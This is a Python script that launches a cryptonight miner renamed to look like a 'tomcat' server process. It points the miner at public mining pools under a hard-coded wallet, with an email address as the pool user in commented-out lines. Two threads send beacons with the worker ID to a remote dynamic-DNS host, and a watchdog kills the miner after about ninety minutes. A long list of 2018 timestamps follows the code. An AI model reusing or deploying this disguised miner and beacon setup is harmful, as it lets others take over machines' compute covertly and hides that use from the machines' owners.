import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:05.064673
#2018-02-17 16:01:05.731960
#2018-02-17 17:47:08.261196
#2018-02-17 19:33:03.575426
#2018-02-17 21:21:04.392943
#2018-02-17 23:04:07.601572
#2018-02-18 00:51:06.602694
#2018-02-18 02:39:06.315695
#2018-02-18 04:27:04.929542
#2018-02-18 06:18:06.009436
#2018-02-18 08:08:07.858763
#2018-02-18 09:55:01.522304
#2018-02-18 11:42:06.542983
#2018-02-18 13:27:03.785345
#2018-02-18 15:17:04.749337
#2018-02-18 17:06:05.154494
#2018-02-18 18:53:06.326537
#2018-02-18 20:41:01.331523
#2018-02-18 22:25:08.060151
#2018-02-19 00:14:03.629911
#2018-02-19 01:59:07.378653
#2018-02-19 03:46:04.338604
#2018-02-19 05:32:03.447810
#2018-02-19 07:20:01.500427
#2018-02-19 09:08:07.477003
#2018-02-19 10:57:08.222022
#2018-02-19 12:44:07.684633
#2018-02-19 14:33:05.969810
#2018-02-19 16:21:04.081111
#2018-02-19 18:08:01.706423
#2018-02-19 19:56:03.894516
#2018-02-19 21:43:07.732940
#2018-02-19 23:31:05.946295
#2018-02-20 01:17:06.177603
#2018-02-20 03:06:05.429009
#2018-02-20 04:53:06.839816
#2018-02-20 06:36:06.147844
#2018-02-20 08:21:02.026944
#2018-02-20 10:06:07.131056
#2018-02-20 11:51:02.208668
#2018-02-20 13:40:01.824960
#2018-02-20 15:25:11.836903
#2018-02-20 17:10:10.500998
#2018-02-20 18:59:01.524954
#2018-02-20 20:48:08.021419
#2018-02-20 22:33:07.018966
#2018-02-21 00:16:07.007921
#2018-02-21 02:02:01.963901
#2018-02-21 03:50:09.921468
#2018-02-21 05:39:07.199810
#2018-02-21 07:28:05.481198
#2018-02-21 09:13:03.594272
#2018-02-21 11:02:07.126122
#2018-02-21 12:50:06.926829
#2018-02-21 14:38:11.224222
#2018-02-21 16:25:06.419312
#2018-02-21 18:17:05.060364
#2018-02-21 20:04:01.830630
#2018-02-21 21:51:05.987628
#2018-02-21 23:37:06.773864
#2018-02-22 01:25:06.695143
#2018-02-22 03:16:05.621133
#2018-02-22 05:02:06.883933
#2018-02-22 06:45:04.364503
#2018-02-22 08:34:04.896225
#2018-02-22 10:21:09.267658
#2018-02-22 12:07:10.047244
#2018-02-22 13:52:08.759487
#2018-02-22 15:40:06.732716
#2018-02-22 17:26:08.959921
#2018-02-22 19:15:10.566680
#2018-02-22 21:06:06.084954
#2018-02-22 22:52:06.319318
#2018-02-23 00:41:05.295377
#2018-02-23 02:31:05.605136
#2018-02-23 04:20:06.496124
#2018-02-23 06:06:06.946400
#2018-02-23 07:52:04.348559
#2018-02-23 10:08:01.556241
#2018-02-23 11:59:05.826311
#2018-02-23 13:48:08.262168
#2018-02-23 15:39:06.906162
#2018-02-23 17:26:09.844259
#2018-02-23 19:12:05.561251
#2018-02-23 20:56:07.057009
#2018-02-23 22:37:07.150823
#2018-02-24 00:23:07.543926
#2018-02-24 02:15:07.748408
#2018-02-24 04:06:05.979961
#2018-02-24 05:53:05.886528
#2018-02-24 07:42:08.137136
#2018-02-24 09:27:04.015375
#2018-02-24 11:21:06.511636
#2018-02-24 13:10:09.244601
#2018-02-24 15:01:05.847487
#2018-02-24 16:51:01.398440
#2018-02-24 18:40:01.560634
#2018-02-24 20:30:06.663234
#2018-02-24 22:27:05.773033
#2018-02-25 01:37:06.082337
#2018-02-25 04:50:05.705418
#2018-02-25 08:12:01.394784